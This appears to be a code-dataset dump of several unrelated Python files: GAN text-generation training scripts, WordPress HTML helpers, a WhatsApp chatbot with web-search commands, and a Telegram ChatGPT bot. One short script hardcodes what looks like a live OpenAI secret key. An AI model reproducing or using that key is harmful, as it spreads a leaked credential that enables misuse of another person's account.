help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | Egojr/optagan | optagan~cond_ad_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data)
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Train critic or generator
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise, gen_labels), gen_labels)
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | meher09/Api-Usage-Practice | Module%2015~wpFunc.py | def list_html_list(any_list):
start = '<!-- wp:list --><ul>'
for element in any_list:
start += f'<!-- wp:list-item --><li>{element}</li><!-- /wp:list-item -->'
ends = '</ul><!-- /wp:list -->'
code = start+ends
return code
def dict_list(dicts):
start = '<!-- wp:list --><ul>'
for key, value in dicts.items():
start += f'<!-- wp:list-item --><li><strong>{key.title()}</strong>: {value.title()}</li><!-- /wp:list-item -->'
ends = '</ul><!-- /wp:list -->'
code = start + ends
return code
def headers(username, password):
import base64
credential = f'{username}:{password}'
token = base64.b64encode(credential.encode())
code = {'Authorization': f'Basic {token.decode("utf-8")}'}
return code
def image_url(src, name):
first_line = '<!-- wp:image {"align":"center","sizeSlug":"large"} -->'
second = f'<figure class="wp-block-image aligncenter size-large"><img src="{src}" alt="{name}"/>'
last = f'<figcaption class="wp-element-caption">{name}</figcaption></figure><!-- /wp:image -->'
code = f'{first_line}{second}{last}'
return code
def wph2(text):
return f'<!-- wp:heading --><h2>{text}</h2><!-- /wp:heading -->'
def openai_text(prompt):
import os
from dotenv import load_dotenv
load_dotenv()
import openai
openai.api_key = os.getenv('API_KEY')
response = openai.Completion.create(
model="text-davinci-003",
prompt= prompt,
temperature=0.7,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
data = response.get('choices')[0].get('text').strip()
code = f'<!-- wp:paragraph --><p>{data}</p><!-- /wp:paragraph -->'
return code
| [] |
2024-01-10 | meher09/Api-Usage-Practice | Module%2010~92%20Open%20Ai%20Data%20Get.py | import openai
openai.api_key = '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'
prompt = input("Enter your Command ")
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.7,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
text = response.get('choices')[0].get('text')
print(text) | [
"Enter your Command "
] |
2024-01-10 | infiloop2/infibot | message_handler.py | import time
import os
from system_messages import get_intro_message, under_quota_message, too_long_message,get_privacy_message
from rate_limits import is_within_limits, reset_limits, use_one_limit
from short_term_memory import get_short_term_memory, write_short_term_memory, append_history
from openai_api import get_openai_response
from dynamo_api import get_quota, get_last_intro_message_timestamp, put_last_intro_message_timestamp, get_last_privacy_accepted_timestamp, get_is_private_mode_on, get_is_unsafe_mode_on, get_last_unsafe_accepted_timestamp
from commands import handle_command
from whatsapp_sender import send_whatsapp_text_reply
from system_commands import is_system_command, handle_system_command, get_unsafe_mode_on_message
# Update this whenever you change privacy/unsafe message so that you prompt the user to accept it again
last_privacy_updated_timestamp = 0
last_unsafe_updated_timestamp = 1682950000
# Handle text messages to phone number ID, from, timestamp with message body
def handle_text_message(phone_number_id, from_, timestamp, message, user_secret):
current_time = int(time.time())
if current_time - timestamp > 60:
# Too old messages which may come through because of whatsapp server issues or retries due to errors
return
# admin system messages
if from_ == os.environ.get("admin_phone_number"):
if message.startswith("Quota"):
spl = message.split(" ")
if len(spl) == 4:
if spl[3] != os.environ.get("admin_password"):
send_whatsapp_text_reply(phone_number_id, from_, "Invalid admin password", is_private_on=False, is_unsafe_on=False)
return
reset_limits(spl[1], spl[2])
send_whatsapp_text_reply(phone_number_id, from_, "Quota reset for " + spl[1] + " to " + str(spl[2]), is_private_on=False, is_unsafe_on=False)
return
# Check if within limits
if not is_within_limits(from_):
send_whatsapp_text_reply(phone_number_id, from_, under_quota_message(from_), is_private_on=False, is_unsafe_on=False)
return
if len(message) > 500:
send_whatsapp_text_reply(phone_number_id, from_, too_long_message(), is_private_on=False, is_unsafe_on=False)
return
# Global modes
is_private_on = get_is_private_mode_on(from_, user_secret)
is_unsafe_on = get_is_unsafe_mode_on(from_, user_secret)
# Verify user has accepted privacy policy
last_privacy_ts = get_last_privacy_accepted_timestamp(from_, user_secret)
if last_privacy_ts < last_privacy_updated_timestamp:
send_whatsapp_text_reply(phone_number_id, from_, "Please read and accept privacy policy before continuing", is_private_on, is_unsafe_on)
send_whatsapp_text_reply(phone_number_id, from_, get_privacy_message(), is_private_on, is_unsafe_on)
return
# Verify user has accepted unsafe policy if in unsafe mode
if is_unsafe_on:
last_unsafe_ts = get_last_unsafe_accepted_timestamp(from_, user_secret)
if last_unsafe_ts < last_unsafe_updated_timestamp:
send_whatsapp_text_reply(phone_number_id, from_, "Please read and accept conditions for unsafe mode before proceeding", is_private_on, is_unsafe_on)
send_whatsapp_text_reply(phone_number_id, from_, get_unsafe_mode_on_message(), is_private_on, is_unsafe_on)
return
history = get_short_term_memory(from_, user_secret)
if len(history) == 0:
# Send welcome message if not sent within last 7 days already
last_ts = get_last_intro_message_timestamp(from_, user_secret)
if current_time - last_ts > 7 * 24 * 3600:
send_whatsapp_text_reply(phone_number_id, from_, get_intro_message(get_quota(from_)), is_private_on, is_unsafe_on)
put_last_intro_message_timestamp(from_, current_time, user_secret)
# Handle system messages from users
if is_system_command(message):
further_ai_reponse, updated_user_message = handle_system_command(message, phone_number_id, from_, user_secret, is_private_on, is_unsafe_on)
if not further_ai_reponse:
return
if updated_user_message is not None:
message = updated_user_message
##### Main AI Response #####
# TODO: Fork if unsafe mode is on
use_one_limit(from_)
ai_response, command = get_openai_response(message, history)
#Send assistant reply
send_whatsapp_text_reply(phone_number_id, from_, ai_response, is_private_on, is_unsafe_on)
# Append to history
history = append_history(history, "user", message)
history = append_history(history, "assistant", ai_response)
write_short_term_memory(from_, history, user_secret, is_private_on)
if command is not None:
handle_command(command, phone_number_id, from_, history, user_secret, is_private_on, is_unsafe_on) | [] |
2024-01-10 | infiloop2/infibot | commands.py | from openai_api import run_dalle, get_openai_response, getChatCompletionResponseCommand
from whatsapp_sender import send_whatsapp_image_reply, send_whatsapp_text_reply
from short_term_memory import write_short_term_memory, append_history
import requests
from bs4 import BeautifulSoup
import os
import re
from system_messages import scrape_error_message, get_web_search_safety_prompt, unsafe_google_search_message
def handle_command(command, phone_number_id, from_, history, user_secret, is_private_on, is_unsafe_on):
if is_unsafe_on:
send_whatsapp_text_reply(phone_number_id, from_, "Sorry commands are disabled in unsafe mode.", is_private_on, is_unsafe_on)
history = append_history(history, "system", "There was an error executing the command")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
if command['command_name'] == 'dalle':
image_prompt = command['image_prompt']
url = run_dalle(image_prompt)
send_whatsapp_image_reply(phone_number_id, from_, url)
history = append_history(history, "system", "The user was given the generated image")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
if command['command_name'] == 'web_search':
search_prompt = command['search_prompt']
if not is_google_search_safe(search_prompt):
send_whatsapp_text_reply(phone_number_id, from_, unsafe_google_search_message(), is_private_on, is_unsafe_on)
history = append_history(history, "system", "The web search was not performed as it was not safe")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
search_result = google_search(search_prompt)
if search_result is None:
# Some error happened
send_whatsapp_text_reply(phone_number_id, from_, scrape_error_message(), is_private_on, is_unsafe_on)
history = append_history(history, "system", "There was an error doing a web search")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
# Append search results and generate a new response
history = append_history(history, "system", "The web search resulted in the following search results: " + search_result)
ai_response, _ = get_openai_response(None, history, False)
send_whatsapp_text_reply(phone_number_id, from_, ai_response, is_private_on, is_unsafe_on)
history = append_history(history, "assistant", ai_response)
write_short_term_memory(from_, history, user_secret, is_private_on)
return
def google_search(term):
url = "https://www.googleapis.com/customsearch/v1"
params = {
"key": os.environ.get("google_search_key"),
"cx": os.environ.get("google_cx"),
"q": term
}
response = requests.get(url, params=params)
if response.status_code == 200:
try:
r = ""
for item in response.json()['items'][:3]:
r = r + scrape_link(item['link'], 250) + "\n\n"
return r
except Exception as _:
return None
else:
return None
def is_google_search_safe(query):
messages = [
{"role": "system", "content": get_web_search_safety_prompt(query)},
]
ai_response, _ = getChatCompletionResponseCommand(messages)
return ai_response.lower().find("no") == -1
def scrape_link(url, limit):
try:
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")
all_text = soup.get_text().lower()
all_text = all_text.replace("\n", " ")
#all_text = re.sub('[^a-z0-9 °]+', '', all_text)
words = all_text.split(" ")
good_words = [string for string in words if len(string) > 2 and len(string) < 20]
return " ".join(good_words[:limit])
except Exception as _:
return "" | [
"image_prompt",
"search_prompt"
] |
2024-01-10 | ansariparvej/Telebot-Using-Chatgpt-API | telebot.py | import os
from dotenv import load_dotenv
from aiogram import Bot, Dispatcher, executor, types
import openai
import sys
class Reference:
"""
A class to store the previous response from the chatGPT API.
"""
def __init__(self) -> None:
self.response = ""
# Load environment variables
load_dotenv()
# Set up OpenAI API key
openai.api_key = os.getenv("OPENAI_API_KEY")
# Create a reference object to store the previous response
reference = Reference()
# Bot token can be obtained via https://t.me/BotFahter
TOKEN = os.getenv("TOKEN")
# Model used in chatGPT
MODEL_NAME = "gpt-3.5-turbo"
# Initialize bot and dispatcher
bot = Bot(token=TOKEN)
dispatcher = Dispatcher(bot)
#2
def clear_past():
"""
A function to clear the previous conversation and context.
"""
reference.response = ""
@dispatcher.message_handler(commands=['start'])
async def welcome(message: types.Message):
"""
A handler to welcome the user and clear past conversation and context.
"""
clear_past()
await message.reply("Hello! \nI'm chatGPT Telegram bot created by Bappy.\n How can I assist you?")
@dispatcher.message_handler(commands=['clear'])
async def clear(message: types.Message):
"""
A handler to clear the previous conversation and context.
"""
clear_past()
await message.reply("I've cleared the past conversation and context.")
@dispatcher.message_handler(commands=['help'])
async def helper(message: types.Message):
"""
A handler to display the help menu.
"""
help_command = """
Hi There, I'm chatGPT Telegram bot created by Bappy! Please follow these commands -
/start - to start the conversation
/clear - to clear the past conversation and context.
/help - to get this help menu.
I hope this helps. :)
"""
await message.reply(help_command)
@dispatcher.message_handler()
async def chatgpt(message: types.Message):
"""
A handler to process the user's input and generate a response using the chatGPT API.
"""
print(f">>> USER: \n\t{message.text}")
response = openai.ChatCompletion.create(
model = MODEL_NAME,
messages = [
{"role": "assistant", "content": reference.response}, # role assistant
{"role": "user", "content": message.text} #our query
]
)
reference.response = response['choices'][0]['message']['content']
print(f">>> chatGPT: \n\t{reference.response}")
await bot.send_message(chat_id = message.chat.id, text = reference.response)
if __name__ == '__main__':
executor.start_polling(dispatcher, skip_updates=False)
| [] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~5_higher_order_functions_map.py | import asyncio
import enum
from typing import TYPE_CHECKING, Optional
import anyio
import instructor
import numpy as np
import openai
import pandas as pd
import tiktoken
import typer
from instructor.patch import wrap_chatcompletion
from openai.types.chat.chat_completion import ChatCompletion
from pydantic import BaseModel
from sklearn.datasets import fetch_20newsgroups
from sklearn.metrics import confusion_matrix, precision_score, recall_score
from tenacity import retry, wait_random_exponential
